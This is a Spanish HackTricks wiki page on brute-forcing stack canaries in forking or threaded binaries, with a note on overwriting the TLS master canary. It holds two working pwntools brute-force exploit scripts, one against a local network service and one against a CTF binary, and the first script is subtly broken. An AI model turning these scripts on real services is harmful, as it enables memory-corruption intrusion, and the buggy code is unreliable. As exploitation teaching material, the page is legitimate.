BF Forked & Threaded Stack Canaries

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén el oficial PEASS & HackTricks swag
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Si te enfrentas a un binario protegido por un canary y PIE (Ejecutable Independiente de la Posición), probablemente necesites encontrar una forma de evadirlos.

Ten en cuenta que checksec podría no detectar que un binario está protegido por un canary si fue compilado estáticamente y no es capaz de identificar la función. Sin embargo, puedes darte cuenta manualmente si encuentras que se guarda un valor en la pila al comienzo de una llamada a función y este valor se verifica antes de salir.

Fuerza bruta en el Canary

La mejor forma de evadir un canary simple es si el binario es un programa que crea procesos hijos cada vez que se establece una nueva conexión con él (servicio de red), porque cada vez que te conectas a él se usará el mismo canary.

Entonces, la mejor forma de evadir el canary es simplemente hacer fuerza bruta carácter por carácter, y puedes averiguar si el byte del canary adivinado fue correcto verificando si el programa ha fallado o continúa su flujo regular. En este ejemplo, la función hace fuerza bruta en un canary de 8 Bytes (x64) y distingue entre un byte adivinado correcto y un byte incorrecto simplemente verificando si se envía una respuesta por parte del servidor (otra forma en otra situación podría ser usando un try/except):

Ejemplo 1

Este ejemplo está implementado para 64 bits pero podría ser fácilmente implementado para 32 bits.

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

Ejemplo 2

Esto está implementado para 32 bits, pero podría cambiarse fácilmente a 64 bits. También tenga en cuenta que para este ejemplo, el programa espera primero un byte para indicar el tamaño de la entrada y la carga útil.

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

Hilos

Los hilos del mismo proceso también compartirán el mismo token canario, por lo tanto será posible forzar un canario si el binario genera un nuevo hilo cada vez que ocurre un ataque.

Además, un desbordamiento de búfer en una función enhebrada protegida con canario podría usarse para modificar el canario maestro almacenado en el TLS. Esto se debe a que podría ser posible alcanzar la posición de memoria donde se almacena el TLS (y por lo tanto, el canario) a través de un desbordamiento de búfer en la pila de un hilo. Como resultado, la mitigación es inútil porque la verificación se realiza con dos canarios que son iguales (aunque modificados). Este ataque se realiza en el documento técnico: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads

Consulte también la presentación de https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015 que menciona que generalmente el TLS se almacena mediante mmap y cuando se crea una pila de un hilo también se genera mediante mmap según esto, lo que podría permitir el desbordamiento como se muestra en el documento técnico anterior.

Otros ejemplos y referencias

https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
64 bits, sin PIE, nx, canario BF, escribir en alguna memoria un ROP para llamar a execve y saltar allí.

AnteriorStack Canaries SiguientePrint Stack Canary

Última actualización hace 3 días